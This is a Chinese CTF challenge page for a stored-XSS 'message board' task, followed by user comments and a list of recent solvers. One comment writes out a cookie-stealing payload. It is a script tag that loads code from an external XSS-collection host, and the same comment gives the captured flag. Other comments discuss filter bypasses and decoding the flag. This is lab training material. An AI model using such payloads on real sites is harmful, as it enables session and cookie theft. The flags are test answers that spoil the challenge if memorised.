留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一  血: ꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励: 5金币
解  决: 2916
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
...
登录回复
评论
admin999 2年前
举报

XSS插进图片了,不过好像收不到flag啊?

回复 0
sshui 2年前
举报

@admin999 找后台

回复 0
admin999 2年前
举报

@sshui 所以这题现在怎么做...

回复 0
sshui 2年前
举报

改题了

回复 0
anguilin 2年前
举报

沙比题

回复 5
Striker123456 2年前
举报

尖括号字体实体,双引号转义,src自动加上http://。这怎么做?

回复 0
b1lld 2年前
举报

我说你们这些网站出题人是在干嘛啊?新手题官方wp写的那么简短,能缩写就整缩写,突出的就是一个边看文章边查才能体现你的深度是吧?一道入门题硬是要查几篇博客一顿查是吧?一道题本来好不容易搜到几篇wp能看的,咔咔一顿操作,做到一半发现原来的做题思路行不通了,哦,看下评论,题目改了。我说你们是在干嘛啊????新手题诶???建这个网站的目的不是让人学习吗??不是为了让人入门吗???不是为了让人按照一个思路去

回复 15
anguilin 2年前
举报

咋做

回复 0
skiller 2年前
举报

db.sql是怎么搜出来的?我用dir没搜出来啊?

回复 9
BugKugirl 2年前
举报

在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)

回复 0
1317554973 2年前
举报

拿到xss得flag填进去但不对

回复 0
17695688750 2年前
举报

奥原来%7b和%7d是{}的asc码,我憨批了

回复 0
17695688750 2年前
举报

我插入了图片xss,平台给我回显了这个flag=flag%7B34211b64224e890f37244b7b065fc409%7D,有人知道怎么转译成正确的flag么

回复 0
zhaiwb 2年前
举报

%7b换成{}

回复 0
13509329442 2年前
举报

url解码

回复 0
泡椒控卫 2年前
举报

https://blog.csdn.net/m0_57954651/article/details/127621060

回复 0

WriteUp

image
丶我亚索贼六

5 金币

立即查看

评分(17)

解题动态

Lmn13644482831 攻破了该题 20小时前
testkuber 攻破了该题 1天前
vespercc 攻破了该题 1天前
2457036664 攻破了该题 1天前
2790819062 攻破了该题 1天前
lunarbyside 攻破了该题 2天前
lon 攻破了该题 3天前
SUSAN777 攻破了该题 3天前
trapping 攻破了该题 3天前
派大星和海绵宝宝 攻破了该题 4天前
forces 攻破了该题 4天前
Eplum 攻破了该题 4天前
17807032991 攻破了该题 6天前
2424291222 攻破了该题 7天前
2424291112 攻破了该题 7天前
qianxin66 攻破了该题 7天前
TOTO1024 攻破了该题 7天前
Zhumeng 攻破了该题 8天前
2687821343 攻破了该题 8天前
Pixelw 攻破了该题 9天前
问题反馈